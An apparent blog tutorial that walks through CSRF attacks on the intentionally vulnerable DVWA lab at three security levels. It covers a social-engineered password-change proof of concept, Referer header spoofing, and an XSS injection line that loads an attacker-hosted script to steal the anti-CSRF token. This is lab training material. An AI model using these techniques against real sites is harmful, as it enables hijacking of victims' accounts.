Let’s learn WebApp Pentest from basic on DVWA. From setup to hack. Part4. CSRF (low to high).

Hey all. How are you doing?

This is part 4 of the WebApp Pentest from basic on DVWA. If you did not read or don’t know how to set it up then go through part 1. Here is the link: https://rahulmondal666.medium.com/lets-learn-webapp-pentest-from-basic-from-setup-to-hack-part-1-5a7d97843373

In part 2 we have done brute force from low level to high level. Here is the link: https://rahulmondal666.medium.com/lets-learn-webapp-pentest-from-basic-on-dvwa-from-setup-to-hack-part-2-bruteforce-low-to-high-82ba55e27a73

In part 3 we have done command injection from low level to high level. Here is the link: https://rahulmondal666.medium.com/lets-learn-webapp-pentest-from-basic-on-dvwa-f215c4bbc8

Now open dvwa and click on csrf. We know what is csrf. Now we need to do it practically.

First, we will do with low security.

So, we can see that it is a page where password changing is happening. Put in the new password and then again confirm the new password.

Now for this generally people use burp suite because burp suite has the feature that it can create a csrf POC with the help of intercepted traffic. But that feature comes with burp suite professional not the community edition. I have the community edition, not the professional. So I will use the csrf POC generator from Github. Here is the link: https://github.com/merttasci/csrf-poc-generator

So, let’s git clone it.

Let’s open that index.html

Cool. Now open the burp suite to intercept the traffic with the new password. I am going to put the new password which is 123456

Let’s intercept that and we can see the new password.

Now, copy this whole request and paste it on the csrf generator and select HTTP as here HTTP is working, not the HTTPS. click on generate, then we can see the csrf POC for that particular request.

Save the POC. and also drop the request from the burp suite for changing the password.

In that saved POC we put any password we want. So let’s put “adminpass” as the password.

Now we are ready with the payload/POC. Now attacker needs to send this using social engineering to the victim and the victim needs to click it. Once clicking it, it will show like this.

The victim needs to click on that submit button, which can be masked or shown totally differently using social engineering. Once click the password will change to adminpass. The password got changed, We can see that in the UI that it is saying password changed, and also in the URL, we can see that as the request is in GET method.

And csrf done.

Now let’s move to medium-security.

So what is medium security? Let’s go to view the source. So we can see that here HTTP Referer is added. Generally, the HTTP referer header checks where the requests are coming from.

So, we already have the POC from the previous but there is no referer header. So what we will do, is change the password value like 1234567

Intercept the traffic after changing the password from the dvwa site(not from our POC)

Copy the entire referer header. Now drop this traffic and intercept the traffic after clicking on submit. (our POC)

Now paste the referer header after the connection

And forward this.

If we want to test whether the password is actually changed or not then we can use the test credential button. Put the username as admin and 1234567 as password. It shows the valid password for the admin.

So again, csrf is done.

Let’s go with the high security.

Now in high security, we can see there is an anti csrf token is used. We know how to bypass this anti csrf token for the brute force which we got to know from the part 1 blog. Now here we have to use a custom-made script where xss is used to do this csrf.

The custom made script link is: https://hd7exploit.wordpress.com/2017/05/27/dvwa-csrf-high-level/

Now copy the script and save that to our machine. Let’s change the link because http://ip_address/dvwa/vulnerabilities/csrf/ is our target and put any password as we want.

Now save that and let’s go to the target page. Here we have to invoke this custom js script to work. So for this, we need to go to the dom xss part. From there we have to do it because this custom script will do a csrf attack by xss.

If we click on the select button then we can see the parameter in the URL(above image). Now we have to put the js file in our HTML directory, so we can easily invoke it.

Let’s invoke it using a simple command which is <script src=“http://jsfilemachineIPaddress/jsfile.js”></script>

I have written in the image which one is the target and which one is the attacker. From the attacker, the custom js file is invoking. Although attackers can invoke from any machine. Sorry for the bad writing on the image.

Now press enter. If it is not showing just click on refresh, it will show you the token. Means it is done. If it is still not showing then please check whether your apache is running or not. The js file is in the HTML directory, for invoking from that, the apache service should be running.

Now let’s go to csrf and click on test credentials.

Or we can also test by logout and login

So, by that csrf is complete.

I hope all of you understood. Let’s meet in the next part.